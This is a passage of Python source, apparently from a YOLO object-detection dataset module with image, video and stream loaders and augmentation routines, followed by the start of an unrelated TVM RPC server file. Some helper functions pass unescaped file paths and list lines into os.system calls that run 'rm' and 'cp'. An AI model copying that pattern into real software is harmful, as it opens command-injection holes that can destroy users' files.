raise Exception('ERROR: %s does not exist' % p)
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'images'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
(p, img_formats, vid_formats)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nf, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nf, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=640):
self.img_size = img_size
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640):
self.mode = 'images'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(eval(s) if s.isnumeric() else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, rank=-1):
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = str(Path(p)) # os-agnostic
parent = str(Path(p).parent) + os.sep
if os.path.isfile(p): # file
with open(p, 'r') as t:
t = t.read().splitlines()
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
elif os.path.isdir(p): # folder
f += glob.iglob(p + os.sep + '*.*')
else:
raise Exception('%s does not exist' % p)
self.img_files = sorted(
[x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats])
except Exception as e:
raise Exception('Error loading data from %s: %s\nSee %s' % (path, e, help_url))
n = len(self.img_files)
assert n > 0, 'No images found in %s. See %s' % (path, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.n = n # number of images
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
# Define labels
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
self.label_files = [x.replace(sa, sb, 1).replace(os.path.splitext(x)[-1], '.txt') for x in self.img_files]
# Check cache
cache_path = str(Path(self.label_files[0]).parent) + '.cache' # cached labels
if os.path.isfile(cache_path):
cache = torch.load(cache_path) # load
if cache['hash'] != get_hash(self.label_files + self.img_files): # dataset changed
cache = self.cache_labels(cache_path) # re-cache
else:
cache = self.cache_labels(cache_path) # cache
# Get labels
labels, shapes = zip(*[cache[x] for x in self.img_files])
self.shapes = np.array(shapes, dtype=np.float64)
self.labels = list(labels)
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache labels
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
pbar = enumerate(self.label_files)
if rank in [-1, 0]:
pbar = tqdm(pbar)
for i, file in pbar:
l = self.labels[i] # label
if l is not None and l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
if rank in [-1, 0]:
pbar.desc = 'Scanning labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
cache_path, nf, nm, ne, nd, n)
if nf == 0:
s = 'WARNING: No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
print(s)
assert not augment, '%s. Can not train without labels.' % s
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc='Caching images')
self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
def cache_labels(self, path='labels.cache'):
# Cache dataset labels, check images and read shapes
x = {} # dict
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for (img, label) in pbar:
try:
l = []
image = Image.open(img)
image.verify() # PIL verify
# _ = io.imread(img) # skimage verify (from skimage import io)
shape = exif_size(image) # image size
assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
if os.path.isfile(label):
with open(label, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32) # labels
if len(l) == 0:
l = np.zeros((0, 5), dtype=np.float32)
x[img] = [l, shape]
except Exception as e:
x[img] = [None, None]
print('WARNING: %s: %s' % (img, e))
x['hash'] = get_hash(self.label_files + self.img_files)
torch.save(x, path) # save for next time
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, len(self.labels) - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_perspective
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_perspective(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
if perspective:
xy = (xy[:, :2] / xy[:, 2:3]).reshape(n, 8) # rescale
else: # affine
xy = xy[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# clip boxes
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=xy.T)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + 1e-16), h2 / (w2 + 1e-16)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + 1e-16) > area_thr) & (ar < ar_thr) # candidates
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def reduce_img_size(path='path/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except:
print('WARNING: image failure %s' % f)
def recursive_dataset2bmp(dataset='path/dataset_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='path/images.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
|
server.py
|
"""RPC server implementation.
Note
----
Server is TCP based with the following protocol:
- Initial handshake to the peer
- [RPC_MAGIC, keysize(int32), key-bytes]
- The key is in format
- {server|client}:device-type[:random-key] [-timeout=timeout]
"""
from __future__ import absolute_import
import os
import ctypes
import socket
import select
import struct
import logging
import multiprocessing
import subprocess
import time
import sys
from .._ffi.function import register_func
from .._ffi.base import py_str
from .._ffi.libinfo import find_lib_path
from ..module import load as _load_module
from ..contrib import util
from . import base
from . base import TrackerCode
def _server_env(load_library, logger):
"""Server environment function return temp dir"""
temp = util.tempdir()
if logger is None:
logger = logging.getLogger()
# pylint: disable=unused-variable
@register_func("tvm.rpc.server.workpath")
def get_workpath(path):
return temp.relpath(path)
@register_func("tvm.rpc.server.load_module", override=True)
def load_module(file_name):
"""Load module from remote side."""
path = temp.relpath(file_name)
m = _load_module(path)
logger.info("load_module %s", path)
return m
libs = []
load_library = load_library.split(":") if load_library else []
for file_name in load_library:
file_name = find_lib_path(file_name)[0]
libs.append(ctypes.CDLL(file_name, ctypes.RTLD_GLOBAL))
logger.info("Load additional library %s", file_name)
temp.libs = libs
return temp
def _serve_loop(sock, addr, load_library, silent):
"""Server loop"""
logger = logging.getLogger("RPCServer")
if silent:
logger.disabled = True
sockfd = sock.fileno()
temp = _server_env(load_library, logger)
base._ServerLoop(sockfd)
temp.remove()
logger.info("Finish serving %s", addr)
def _parse_server_opt(opts):
# parse client options
ret = {}
for kv in opts:
if kv.startswith("-timeout="):
ret["timeout"] = float(kv[9:])
return ret
def _listen_loop(sock, port, rpc_key, tracker_addr, load_library, custom_addr, silent):
"""Listening loop of the server master."""
logger = logging.getLogger("RPCServer")
if silent:
logger.disabled = True
def _accept_conn(listen_sock, tracker_conn, ping_period=2):
"""Accept connection from the other places.
Parameters
----------
listen_sock: Socket
The socket used by listening process.
tracker_conn : connnection to tracker
